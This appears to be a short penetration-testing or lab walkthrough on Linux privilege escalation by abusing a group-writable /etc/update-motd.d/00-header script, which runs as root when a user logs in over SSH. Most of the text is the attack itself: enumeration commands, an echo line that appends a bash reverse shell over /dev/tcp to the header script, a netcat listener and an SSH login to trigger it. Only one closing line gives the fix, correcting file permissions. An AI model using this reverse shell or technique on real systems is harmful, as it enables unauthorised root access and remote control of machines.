Having permissions to modify /etc/update-motd.d/00-header allows us to inject code and execute it at the time of a user logging in, the code will be executed by the SSH service owner, most likely root


1. Check the current permissions of the user

  • id

2. Verify the folder and file permissions

  • ls -ld /etc/update-motd.d
  • ls -lR /etc/update-motd.d/

As we can see our user is part of the sysadmin group which has RWX permissions.


1. Modify the file /etc/update-motd.d/00-header, probably add a reverse shell

  • echo 'bash -c "bash -i >& /dev/tcp/ 0>&1"' >> /etc/update-motd.d/00-header

2. Start a listener in the attacker machine

  • nc -lvp 4444

3. Log again

  • ssh sysadmin@

4. Check the listener and there should be a reverse shell


Assign proper permissions to the files in /etc/update-motd.d